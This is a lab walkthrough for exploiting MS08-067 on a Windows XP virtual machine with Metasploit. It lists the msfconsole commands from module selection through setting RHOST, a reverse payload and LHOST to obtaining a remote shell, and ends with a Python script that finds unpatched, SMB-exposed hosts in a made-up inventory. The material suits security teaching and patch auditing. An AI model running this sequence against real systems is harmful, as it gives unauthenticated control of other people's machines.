
Exploiting Windows XP using Metasploit

Today we will exploit a Windows XP system using the vulnerability described in Microsoft Security Bulletin MS08-067. MS08-067 is a flaw in netapi32.dll (the Server service) on Windows XP. It allows an attacker to send a specially crafted RPC request over SMB (Server Message Block) and take control of the target, and no authentication is required.



Deliverable:


Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker’s System: Kali Linux

  • Target System: Windows XP


In Kali Linux --> Terminal


1. Metasploit uses a PostgreSQL database to record what the user does (hosts, services, sessions and results), so start it first.

~# service postgresql start (Enter)


2. Starting metasploit

~# service metasploit start (Enter)


The above command creates a PostgreSQL user called 'msf3' and the corresponding database. It also starts Metasploit's RPC server and web server. (On newer Kali releases there is no metasploit service; the database is initialised with msfdb init instead.)


3. Starting msfconsole.

~# msfconsole (Enter)


4. Search for the exploit module for MS08-067.

> search ms08_067_netapi (Enter)


5. Use that exploit.

> use exploit/windows/smb/ms08_067_netapi (Enter)


> show options (Enter)


6. Now set the target’s IP address

> set RHOST [IP address of target] (Enter)

RHOST --> Remote Host (Target)


> show payloads (Enter)


7. Choose and set a payload of your interest. If no payload is set, Metasploit uses the module's default one.

Ex. > set payload [payload name with path] (Enter)


> show options (Enter)


8. Set payload options.

Ex. > set LHOST [IP address of the attacker] (Enter)

Which options are required depends on the payload used; a reverse payload needs LHOST so the target knows where to connect back.

LHOST --> Local Host (Attacker)


9. Exploit the target.

> exploit (Enter)


10. If the exploit succeeds we get a shell, i.e. the command prompt of the victim. Any command on the Windows XP system can now be run from Kali Linux.
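From the defender's side, the practical question after a lab like this is which machines on the network are still exposed to MS08-067. The following Python script is an added example and is not part of the original write-up or of Metasploit; it checks a small asset inventory for hosts on an affected Windows version that lack the MS08-067 hotfix (KB958644) and have the SMB ports (139/445) reachable. The inventory, host names and addresses are constructed for illustration.

```python
"""Flag hosts still exposed to MS08-067 from a small asset inventory.

Added example, not part of the original lab. Facts used: the MS08-067
fix shipped as hotfix KB958644; the vulnerable Server service is reached
over SMB (TCP 139/445); the bulletin rated Windows 2000/XP/Server 2003
Critical (unauthenticated RCE) and Vista/Server 2008 Important.
"""
from dataclasses import dataclass, field

MS08_067_HOTFIX = "KB958644"   # hotfix id that carries the MS08-067 fix
SMB_PORTS = {139, 445}         # ports over which the Server service is reached

# Severity per the bulletin, keyed by lower-cased OS family name.
AFFECTED = {
    "windows 2000": "critical",
    "windows xp": "critical",
    "windows server 2003": "critical",
    "windows vista": "important",
    "windows server 2008": "important",
}


@dataclass
class Host:
    ip: str
    os: str
    hotfixes: set = field(default_factory=set)    # installed KB ids
    open_ports: set = field(default_factory=set)  # TCP ports reachable from the LAN


def assess(host):
    """Return (severity, reason) if the host is exposed, else None."""
    severity = AFFECTED.get(host.os.lower())
    if severity is None:
        return None                                # OS family not affected
    if MS08_067_HOTFIX in {h.upper() for h in host.hotfixes}:
        return None                                # patched
    reachable = sorted(host.open_ports & SMB_PORTS)
    if not reachable:
        # Unpatched, but the network path the exploit needs is absent.
        return ("low", "unpatched but SMB (139/445) not reachable")
    return (severity, f"unpatched, SMB reachable on {reachable}")


def exposed_hosts(inventory):
    """List (ip, severity, reason) for exposed hosts, most severe first."""
    order = {"critical": 0, "important": 1, "low": 2}
    findings = []
    for h in inventory:
        result = assess(h)
        if result:
            findings.append((h.ip, result[0], result[1]))
    findings.sort(key=lambda f: (order[f[1]], f[0]))
    return findings


# Constructed inventory with lab-style private addresses (not real hosts).
INVENTORY = [
    Host("192.168.56.101", "Windows XP", set(), {139, 445}),
    Host("192.168.56.102", "Windows XP", {"KB958644"}, {139, 445}),
    Host("192.168.56.103", "Windows Server 2003", set(), {3389}),
    Host("192.168.56.104", "Windows 7", set(), {445}),
    Host("192.168.56.105", "Windows Vista", set(), {445}),
]

if __name__ == "__main__":
    for ip, sev, why in exposed_hosts(INVENTORY):
        print(f"{ip:16} {sev:9} {why}")
```

Run against the constructed inventory it reports the unpatched XP box as critical, the Vista box as important, and the 2003 host as low because SMB is not reachable; the patched XP host and the Windows 7 host are not listed. In a real environment the inventory would come from your patch-management or scanning data rather than a literal list.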

